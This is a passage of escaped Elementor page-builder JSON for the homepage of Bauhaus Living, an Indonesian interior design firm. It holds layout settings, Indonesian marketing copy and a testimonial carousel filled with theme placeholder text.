Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"